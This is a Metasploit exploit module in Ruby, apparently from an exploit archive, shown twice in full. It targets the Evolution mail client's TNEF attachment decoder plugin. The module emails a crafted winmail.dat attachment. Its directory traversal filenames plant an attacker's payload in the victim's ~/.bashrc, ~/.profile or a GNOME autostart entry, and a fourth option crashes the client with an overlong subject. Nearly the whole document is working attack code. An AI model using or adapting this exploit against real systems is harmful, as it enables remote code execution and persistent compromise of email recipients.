ykoster · October 1, 2019 14:10
diff --git a/evolution_tnef_plugin_multil.rb b/evolution_tnef_plugin_multil.rb
 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote

 	include Msf::Exploit::Remote::SMTPDeliver

 	def initialize(info = {})
 		super(update_info(info,
 			'Name'			=> 'Evolution TNEF Attachment decoder plugin directory traversal and buffer overflow vulnerabilities',
 			'Description'		=> %q{
 				The Evolution TNEF Attachment decoder plugin is affected by several 
 				directory traversal and buffer overflow vulnerabilities. The directory 
 				traversal vulnerabilities allow attackers to overwrite or create local 
 				files with the privileges of the target user. Exploiting the buffer
 				overflow vulnerabilities allows for arbitrary code execution with the
 				privileges of the target user.
 			},
 			'Author'		=> 'Yorick Koster <[email protected]>',
 			'Version'		=> '1',
 			'References'		=> 
 				[
 					['URL', 'http://www.akitasecurity.nl/advisory.php?id=AK20090601'],
 				],
 			'Platform'		=> ['unix', 'linux', 'bsd'],
 			'Arch'			=> ARCH_CMD,
 			'Handler'		=> Msf::Handler::None,
 			'Session'		=> Msf::Sessions::CommandShell,
 			'Targets'		=>
 				[
 					['GNOME (~/.config/autostart/sploit.desktop)', {}],
 					['Bash (~/.bashrc)', {}],
 					['Shell (~/.profile)', {}],
 					['Crash Evolution', {}],
 				],
 			'DefaultTarget'		=> 0))
 			
 			register_options(
 				[
 					OptString.new('MAILSUBJECT', [false, "The subject of the sent email"])
 				], self.class)	
 	end

 	def exploit
 		msg = Rex::MIME::Message.new
 		msg.mime_defaults
 		msg.subject = datastore['MAILSUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
 		msg.to = datastore['MAILTO']
 		msg.from = datastore['MAILFROM']
 		body = Rex::Text.encode_base64(create_tnef_exploit(payload), "\r\n")
 		content_type = "application/ms-tnef"
 		content_disposition = "attachment;\r\n\tname=\"winmail.dat\""
 		msg.add_part(body, content_type, "base64", content_disposition)
 		send_message(msg.to_s)		
 	end

 	def create_tnef_exploit(payload)
 		sploit = create_tnef_header

 		filename = "foobar.txt"
 		content  = ""

 		if target.name =~ /Bash/
 			filename = "/../../../../.bashrc\x00"

 			content = "\# ~/.bashrc: executed by bash(1) for non-login shells.\n\n"
 			content << "[ -z \"$PS1\" ] && return\n"
 			content << "export HISTCONTROL=ignoredups\n"
 			content << "export HISTCONTROL=ignoreboth\n"
 			content << "shopt -s checkwinsize\n"
 			content << "if [ -f /etc/bash_completion ]; then\n"
 			content << "    . /etc/bash_completion\n"
 			content << "fi\n"
 			content << "\n#{payload.encoded}\n"
 		end

 		if target.name =~ /Shell/
 			filename = "/../../../../.profile\x00"

 			content = "\# ~/.profile: executed by the command interpreter for login shells.\n\n"
 			content << "if [ -n \"$BASH_VERSION\" ]; then\n"
 		    	content << "	if [ -f \"$HOME/.bashrc\" ]; then\n"
 		    	content << "		. \"$HOME/.bashrc\"\n"
 		    	content << "    fi\n"
 		    	content << "fi\n\n"
 		    	content << "if [ -d \"$HOME/bin\" ] ; then\n"
 		    	content << "    PATH=\"$HOME/bin:$PATH\"\n"
 		    	content << "fi\n"
 			content << "\n#{payload.encoded}\n"
 		end

 		if target.name =~ /GNOME/
 			filename = "/../../../../.config/autostart/sploit.desktop\x00"

 			content = "[Desktop Entry]\n"
 			content << "Version=1.0\n"
 			content << "Type=Application\n"
 			content << "Name=Sploit\n"
 			content << "Comment=\n"
 			content << "Exec=#{payload.encoded}\n"
 			content << "StartupNotify=false\n"
 			content << "Terminal=false\n"
 			content << "Hidden=false\n"
 		end

 		if target.name =~ /Crash/
 			# triggers crash through an overly long vcard file name
 			sploit << "\x01"						# Level type	LVL_MESSAGE
 			sploit << "\x08\x80"						# Name		attMessageClass (0x8008)
 			sploit << "\x07\x00"						# Type		atpWord (0x0007)
 			sploit << "\x0c\x00\x00\x00"					# Len		0x0000000c
 			sploit << "\x49\x50\x4d\x2e\x43\x6f\x6e\x74\x61\x63\x74\x00"	# IPM.Contact
 			sploit << "\xe0\x03"						# Checksum

 			subject = Rex::Text.rand_text_alpha(1023)
 			subject << "\x00"
 			
 			sploit << "\x01"						# Level type	LVL_MESSAGE
 			sploit << "\x04\x80"						# Name		attSubject (0x8004)
 			sploit << "\x01\x00"						# Type		atpString (0x0001)
 			sploit << [subject.length].pack("V")				# Len
 			sploit << subject
 			sploit << tnef_checksum(subject)				# Checksum

 			return sploit
 		end

 		# start of TNEF attachment
 		sploit << "\x02"			# Level type	LVL_ATTACHMENT
 		sploit << "\x02\x90"			# Name		attAttachRenddata (0x9002)
 		sploit << "\x06\x00"			# Type		atpByte (0x0006)
 		sploit << "\x0e\x00\x00\x00"		# Len		0x0000000e
 		sploit << "\x01\x00\xff\xff\xff\xff\x20\x00\x20\x00\x00\x00\x00\x00"
 		sploit << "\x3d\x04"			# Checksum

 		sploit << "\x02"			# Level type	LVL_ATTACHMENT
 		sploit << "\x10\x80"			# Name		attAttachTitle (0x8010)
 		sploit << "\x01\x00"			# Type		atpString (0x0001)
 		sploit << [filename.length].pack("V")	# Len
 		sploit << filename
 		sploit << tnef_checksum(filename)

 		sploit << "\x02"			# Level type	LVL_ATTACHMENT
 		sploit << "\x0f\x80"			# Name		attAttachData (0x800f)
 		sploit << "\x06\x00"			# Type		atpByte (0x0006)
 		sploit << [content.length].pack("V")	# Len
 		sploit << content
 		sploit << tnef_checksum(content)

 		return sploit
 	end

 	def create_tnef_header
 		# TNEF Header
 		buf = "\x78\x9f\x3e\x22"		# Signature	0x223e9f78
 		buf << "\x00\x00"			# Key
 		
 		# TNEF Attributes
 		buf << "\x01"				# Level type	LVL_MESSAGE
 		buf << "\x06\x90"			# Name		attTnefVersion (0x9006)
 		buf << "\x08\x00"			# Type		atpDword (0x0008)
 		buf << "\x04\x00\x00\x00"		# Len		0x00000004
 		buf << "\x00\x00\x01\x00"
 		buf << "\x01\x00"			# Checksum

 		buf << "\x01"				# Level type	LVL_MESSAGE
 		buf << "\x07\x90"			# Name		attOemCodepage (0x9007)
 		buf << "\x06\x00"			# Type		atpByte (0x0006)
 		buf << "\x08\x00\x00\x00"		# Len		0x00000008
 		buf << "\xe4\x04\x00\x00\x00\x00\x00\x00"
 		buf << "\xe8\x00"			# Checksum

 		buf << "\x01"				# Level type	LVL_MESSAGE
 		buf << "\x0d\x80"			# Name		attPriority (0x800d)
 		buf << "\x04\x00"			# Type		atpShort (0x0004)
 		buf << "\x02\x00\x00\x00"		# Len		0x00000002
 		buf << "\x02\x00"
 		buf << "\x02\x00"			# Checksum

 		return buf
 	end

 	def tnef_checksum(buf = '')
 		checksum = 0;

 		buf.each_byte { |b|
 			checksum += b
 		}

 		return [checksum % 65536].pack("v")
 	end
 end
	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::SMTPDeliver

	def initialize(info = {})
	super(update_info(info,
	'Name' => 'Evolution TNEF Attachment decoder plugin directory traversal and buffer overflow vulnerabilities',
	'Description' => %q{
	The Evolution TNEF Attachment decoder plugin is affected by several
	directory traversal and buffer overflow vulnerabilities. The directory
	traversal vulnerabilities allow attackers to overwrite or create local
	files with the privileges of the target user. Exploiting the buffer
	overflow vulnerabilities allows for arbitrary code execution with the
	privileges of the target user.
	},
	'Author' => 'Yorick Koster <[email protected]>',
	'Version' => '1',
	'References' =>
	[
	['URL', 'http://www.akitasecurity.nl/advisory.php?id=AK20090601'],
	],
	'Platform' => ['unix', 'linux', 'bsd'],
	'Arch' => ARCH_CMD,
	'Handler' => Msf::Handler::None,
	'Session' => Msf::Sessions::CommandShell,
	'Targets' =>
	[
	['GNOME (~/.config/autostart/sploit.desktop)', {}],
	['Bash (~/.bashrc)', {}],
	['Shell (~/.profile)', {}],
	['Crash Evolution', {}],
	],
	'DefaultTarget' => 0))

	register_options(
	[
	OptString.new('MAILSUBJECT', [false, "The subject of the sent email"])
	], self.class)
	end

	def exploit
	msg = Rex::MIME::Message.new
	msg.mime_defaults
	msg.subject = datastore['MAILSUBJECT'] \|\| Rex::Text.rand_text_alpha(rand(32)+1)
	msg.to = datastore['MAILTO']
	msg.from = datastore['MAILFROM']
	body = Rex::Text.encode_base64(create_tnef_exploit(payload), "\r\n")
	content_type = "application/ms-tnef"
	content_disposition = "attachment;\r\n\tname=\"winmail.dat\""
	msg.add_part(body, content_type, "base64", content_disposition)
	send_message(msg.to_s)
	end

	def create_tnef_exploit(payload)
	sploit = create_tnef_header

	filename = "foobar.txt"
	content = ""

	if target.name =~ /Bash/
	filename = "/../../../../.bashrc\x00"

	content = "\# ~/.bashrc: executed by bash(1) for non-login shells.\n\n"
	content << "[ -z \"$PS1\" ] && return\n"
	content << "export HISTCONTROL=ignoredups\n"
	content << "export HISTCONTROL=ignoreboth\n"
	content << "shopt -s checkwinsize\n"
	content << "if [ -f /etc/bash_completion ]; then\n"
	content << " . /etc/bash_completion\n"
	content << "fi\n"
	content << "\n#{payload.encoded}\n"
	end

	if target.name =~ /Shell/
	filename = "/../../../../.profile\x00"

	content = "\# ~/.profile: executed by the command interpreter for login shells.\n\n"
	content << "if [ -n \"$BASH_VERSION\" ]; then\n"
	content << " if [ -f \"$HOME/.bashrc\" ]; then\n"
	content << " . \"$HOME/.bashrc\"\n"
	content << " fi\n"
	content << "fi\n\n"
	content << "if [ -d \"$HOME/bin\" ] ; then\n"
	content << " PATH=\"$HOME/bin:$PATH\"\n"
	content << "fi\n"
	content << "\n#{payload.encoded}\n"
	end

	if target.name =~ /GNOME/
	filename = "/../../../../.config/autostart/sploit.desktop\x00"

	content = "[Desktop Entry]\n"
	content << "Version=1.0\n"
	content << "Type=Application\n"
	content << "Name=Sploit\n"
	content << "Comment=\n"
	content << "Exec=#{payload.encoded}\n"
	content << "StartupNotify=false\n"
	content << "Terminal=false\n"
	content << "Hidden=false\n"
	end

	if target.name =~ /Crash/
	# triggers crash through an overly long vcard file name
	sploit << "\x01" # Level type LVL_MESSAGE
	sploit << "\x08\x80" # Name attMessageClass (0x8008)
	sploit << "\x07\x00" # Type atpWord (0x0007)
	sploit << "\x0c\x00\x00\x00" # Len 0x0000000c
	sploit << "\x49\x50\x4d\x2e\x43\x6f\x6e\x74\x61\x63\x74\x00" # IPM.Contact
	sploit << "\xe0\x03" # Checksum

	subject = Rex::Text.rand_text_alpha(1023)
	subject << "\x00"

	sploit << "\x01" # Level type LVL_MESSAGE
	sploit << "\x04\x80" # Name attSubject (0x8004)
	sploit << "\x01\x00" # Type atpString (0x0001)
	sploit << [subject.length].pack("V") # Len
	sploit << subject
	sploit << tnef_checksum(subject) # Checksum

	return sploit
	end

	# start of TNEF attachment
	sploit << "\x02" # Level type LVL_ATTACHMENT
	sploit << "\x02\x90" # Name attAttachRenddata (0x9002)
	sploit << "\x06\x00" # Type atpByte (0x0006)
	sploit << "\x0e\x00\x00\x00" # Len 0x0000000e
	sploit << "\x01\x00\xff\xff\xff\xff\x20\x00\x20\x00\x00\x00\x00\x00"
	sploit << "\x3d\x04" # Checksum

	sploit << "\x02" # Level type LVL_ATTACHMENT
	sploit << "\x10\x80" # Name attAttachTitle (0x8010)
	sploit << "\x01\x00" # Type atpString (0x0001)
	sploit << [filename.length].pack("V") # Len
	sploit << filename
	sploit << tnef_checksum(filename)

	sploit << "\x02" # Level type LVL_ATTACHMENT
	sploit << "\x0f\x80" # Name attAttachData (0x800f)
	sploit << "\x06\x00" # Type atpByte (0x0006)
	sploit << [content.length].pack("V") # Len
	sploit << content
	sploit << tnef_checksum(content)

	return sploit
	end

	def create_tnef_header
	# TNEF Header
	buf = "\x78\x9f\x3e\x22" # Signature 0x223e9f78
	buf << "\x00\x00" # Key

	# TNEF Attributes
	buf << "\x01" # Level type LVL_MESSAGE
	buf << "\x06\x90" # Name attTnefVersion (0x9006)
	buf << "\x08\x00" # Type atpDword (0x0008)
	buf << "\x04\x00\x00\x00" # Len 0x00000004
	buf << "\x00\x00\x01\x00"
	buf << "\x01\x00" # Checksum

	buf << "\x01" # Level type LVL_MESSAGE
	buf << "\x07\x90" # Name attOemCodepage (0x9007)
	buf << "\x06\x00" # Type atpByte (0x0006)
	buf << "\x08\x00\x00\x00" # Len 0x00000008
	buf << "\xe4\x04\x00\x00\x00\x00\x00\x00"
	buf << "\xe8\x00" # Checksum

	buf << "\x01" # Level type LVL_MESSAGE
	buf << "\x0d\x80" # Name attPriority (0x800d)
	buf << "\x04\x00" # Type atpShort (0x0004)
	buf << "\x02\x00\x00\x00" # Len 0x00000002
	buf << "\x02\x00"
	buf << "\x02\x00" # Checksum

	return buf
	end

	def tnef_checksum(buf = '')
	checksum = 0;

	buf.each_byte { \|b\|
	checksum += b
	}

	return [checksum % 65536].pack("v")
	end
	end